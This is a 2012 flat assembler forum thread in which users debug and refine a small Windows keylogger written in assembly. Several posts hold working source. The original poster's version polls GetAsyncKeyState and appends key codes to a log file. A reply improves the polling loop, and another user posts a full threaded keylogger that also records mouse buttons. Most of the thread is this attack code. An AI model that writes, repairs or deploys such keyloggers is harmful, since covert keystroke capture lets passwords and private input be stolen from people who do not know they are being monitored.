flat assembler
Message board for the users of flat assembler.
Index
> Windows > Very small and stupid keylogger still not work |
Author |
|
revolution 27 May 2012, 11:31
The msvcrt library needs cinvoke.
BTW: The return value from GetAsyncKeyState is ever going to be -32767 (0xffff8001)? Where did you get that value from? |
|||
27 May 2012, 11:31 |
|
wsx 27 May 2012, 12:31
MSDN says: "If the most significant bit is set, the key is down, and if the least significant bit is set, the key was pressed after the previous"
Referring to a SHORT means 0x8001 Still not work Code: format PE GUI 4.0 entry start include 'win32a.inc' start: cinvoke fopen, fName, mode ;Open file mov [hLog], eax ;Store handle xor ebx, ebx ;Counter set to zero getkey: invoke Sleep, 50 ;Wait 50ms inc bl ;Increment. If it exceeds 255, it will set to zero invoke GetAsyncKeyState, ebx and ax, 0x8001 cmp ax, 0x8001 ;If the key is pressed jne getkey write: cinvoke fputc, ebx, [hLog] ;Write vkCode to the file jmp getkey fName db 'l09.txt',0 mode db 'a',0 hLog dd ? data import library kernel32, 'kernel32.dll',\ user32, 'user32.dll',\ msvcrt, 'msvcrt.dll' include 'api\kernel32.inc' include 'api\user32.inc' import msvcrt,\ fopen, 'fopen',\ fputc, 'fputc' end data |
|||
27 May 2012, 12:31 |
|
revolution 27 May 2012, 14:36
wsx wrote: MSDN says: "If the most significant bit is set, the key is down, and if the least significant bit is set, the key was pressed after the previous" You can use a debugger to verify values being returned. |
|||
27 May 2012, 14:36 |
|
wsx 27 May 2012, 15:19
In fact, i used and operator (see above)
EDIT: Work! The problem was the Sleep But w/o Sleep steals a lot of CPU usage |
|||
27 May 2012, 15:19 |
|
AsmGuru62 27 May 2012, 16:00
Try to do the loop on a separate thread.
This may decrease CPU usage. |
|||
27 May 2012, 16:00 |
|
revolution 27 May 2012, 16:31
With a 50ms sleep you are only reading keys at 20 per second. Perhaps better to read all 256 key codes in one loop and then sleep 50ms between loops.
Code: ;... xor ebx, ebx ;Counter set to zero getkey: invoke GetAsyncKeyState, ebx and ax, 0x8001 cmp ax, 0x8001 ;If the key is pressed jne skipwrite cinvoke fputc, ebx, [hLog] ;Write vkCode to the file skipwrite: inc bl ;Increment. If it exceeds 255, it will set to zero jne getkey invoke Sleep, 50 ;Wait 50ms jmp getkey ;... |
|||
27 May 2012, 16:31 |
|
typedef 27 May 2012, 18:19
here's what I wrote sometime ago
Code: format pe console 4.0 include 'win32ax.inc' entry main section 'txt' code readable executable main: invoke CreateThread,0,0,thread_logger,0,0,0 invoke WaitForSingleObject,eax,0FFFFFFFh ;Say what ?, no it won't reach here fmt db '0x%04X',10,0 proc thread_logger,lpDat mov dword[ebp-4],1 reset: mov dword[ebp-4],1 for_loop: push dword[ebp-4] call [GetAsyncKeyState] cmp eax,-32767 jne no_log push dword[ebp-4] push fmt call [printf] add esp, 8 no_log: inc dword[ebp-4] cmp dword[ebp-4],100000000b jnz for_loop push 09 call [Sleep] jmp reset endp section '.idata' import data readable library user32,'user32.dll',\ kernel32,'kernel32.dll',\ msvc,'msvcrt.dll' import msvc,\ printf,'printf' include 'api/user32.inc' include 'api/kernel32.inc' It grabs mouse buttons too. |
|||
27 May 2012, 18:19 |
|
AdaS 07 Jun 2013, 09:43
this one works very well.[/url]
_________________ |
|||
07 Jun 2013, 09:43 |
|
< Last Thread | Next Thread > |
Forum Rules:
|
Copyright © 1999-2024, Tomasz Grysztar. Also on GitHub, YouTube.
Website powered by rwasa.